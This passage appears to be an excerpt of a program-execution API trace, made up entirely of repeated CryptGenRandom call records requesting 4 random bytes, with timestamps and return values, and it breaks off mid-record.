CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.974] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: 